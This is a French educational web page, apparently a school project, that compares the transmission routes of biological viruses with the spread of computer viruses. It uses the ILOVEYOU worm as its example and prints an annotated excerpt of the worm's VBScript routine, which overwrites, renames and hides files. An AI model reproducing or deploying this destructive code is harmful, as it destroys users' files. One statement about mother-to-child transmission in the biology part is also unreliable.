Les modes de transmission d'un virus

Biologique

Il existe trois types majeurs de transmission : les virus qui se maintiennent dans une seule espèce, avec transmission directe, ceux qui peuvent croiser la barrière d’espèce et ceux qui infectent via un vecteur, c est a dire les espèces qui transmettent la maladie mais qui eux n en sont pas porteurs.

Type de transmission

Exemples de virus

Humain à humain

Rougeole, hépatite A

Animal à humain

Rage, grippe (certains cas)

Arthropode à humain

Dengue, fièvre jaune, chikungunya

Schéma n°2 : Exemple de transmission du virus de la grippe de animal à humain

Veuillez cliquer sur l'image pour l'agrandir

 

Il existe plusieurs moyens de transmissions chez l’homme :

- La transmission d’affections : Respiratoires via les gouttelettes de sécrétions respiratoires, pénétrant dans les voies respiratoires. (Peu persistant dans l'environnement)

- La transmission féco-orale : La contamination buccale par un virus provenant directement des mains ou indirectement de l’eau ou de la nourriture. Ces virus sont rapidement transmissibles (ils se propagent facilement : ils contaminent des objets usuels comme les poignées de portes, téléphones…)
 

- Les transmissions parentérales : Cette transmission concernent les virus transmis par injection et extension. (Par les seringues par exemple)
 

- La transmission sexuelle : C'est à dire un contact de muqueuses à muqueuses.
 

- La transmission mère/enfant : Cela concerne les virus qui ont infecté les cellules germinals de l’un au moins des parents.
 

- La transmission par arthropodes (moustiques, tiques…) : Lorsque qu’un insecte ayant un virus pique un Homme.
 

- La zoonose : Le cas de virus touchant les animaux, mais qui peuvent affecter l’Homme.

 

Informatique

La particularité des virus informatiques est qu'ils ne peuvent se reproduire sans l'aide d'un programme cible existant, tout comme les virus biologique qui ne peuvent se développer que par l’intermédiaire d’une cellule hôte.
Pour étudier les fonctionnements de la transmission des virus nous allons étudier le fonctionnement du virus « I LOVE YOU », qui a pour seul objectif de s envoyer a tout les contactes mail des systèmes infectés.
Le virus s'inscrit dans la base de registre pour être lancer à chaque démarrage en faisant appel a des algorithmes il se dissimule au sains d un programme. Il télécharge ensuite un cheval de Troie (virus qui permet de prendre le contrôle de l’ordinateur) pour capturer les différents mots de passe utilisés par l'utilisateur afin d accéder a sa boite mail et enfin il s'auto-envoie à la totalité du carnet d adresses d’Outlook avant de détruire certains fichiers du disque dur.

 

Voici la partie destructrice du virus :

 

sub infectfiles(folderspec) 
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
        ext=fso.GetExtensionName(f1.path)
        ext=lcase(ext)
s=lcase(f1.name

Procédure d'infection des fichiers du dossier

Pour chaque fichier, déterminer l’extension

if (ext="vbs") or (ext="vbe") then
               set ap=fso.OpenTextFile(f1.path,2,true)
               ap.write vbscopy
ap.close
Les fichiers VBS et VBE sont écrasés par le virus
elseif(ext="js") or (ext="jse") or (ext="css") 
           or (ext="wsh") or (ext="sct") or (ext="hta") then
               set ap=fso.OpenTextFile(f1.path,2,true)
               ap.write vbscopy
               ap.close
               bname=fso.GetBaseName(f1.path)
               set cop=fso.GetFile(f1.path)
               cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)

Les fichiers JS, JSE, CSS, WSH, SCT, HTA
sont écrasés par le virus
("open . write . close")
et renommés avec extension VBS

elseif(ext="jpg") or (ext="jpeg") then
               set ap=fso.OpenTextFile(f1.path,2,true)
               ap.write vbscopy
               ap.close
               set cop=fso.GetFile(f1.path)
               cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
Les fichiers JPG et JPEG
sont écrasés par le virus et
une extension VBS est ajoutée à leurs noms
        elseif(ext="mp3") or (ext="mp2") then
               set   mp3=fso.CreateTextFile(f1.path&".vbs")
               mp3.write vbscopy
               mp3.close
               set att=fso.GetFile(f1.path)
               att.attributes=att.attributes+2
 
end if

Des fichiers contenant le virus
sont créés avec des noms identiques
et extension VBS ajoutée

Les fichiers MP3 et MP2
sont cachés (« attributes » )

 

Au final,  les fichiers vbs, vbe, js, jse, css, wsh, sct, hta sont effacés et remplacés par le code du virus. 
Les fichiers *.jpg et *.jpeg sont effacés après avoir créée des copies du virus *.jpg.vbs et *.jpeg.vbs. 
Les fichiers *.mp3 et *.mp2 son cachés, et des fichiers *.mp3.vbs et *.mp2.vbs sont créés, contenant le code du virus.
Par l utilisation d algorithme le virus se repend ainsi dans les différents fichiers de l ordinateur et va s'auto-envoyer pour nuire a une population plus vaste encore. 

 

Synthèse : les virus sont dissimulés soit dans une cellule soit dans un programme. Ils ont pour objectifs de nuire à celle-ci puis de se rependre au sein du système tout entier. Parfois en utilisent les voix reliées au monde extérieur (comme les voies respiratoire, internet ou encore les voix sexuels) ils peuvent nuire à une plus vaste population encore. Les virus informatiques ne s'attachent qu'à certains programmes en fonction du type de virus, et les virus biologiques ne s'attachent qu'a certaines cellules.

Créer un site gratuit avec e-monsite - Signaler un contenu illicite sur ce site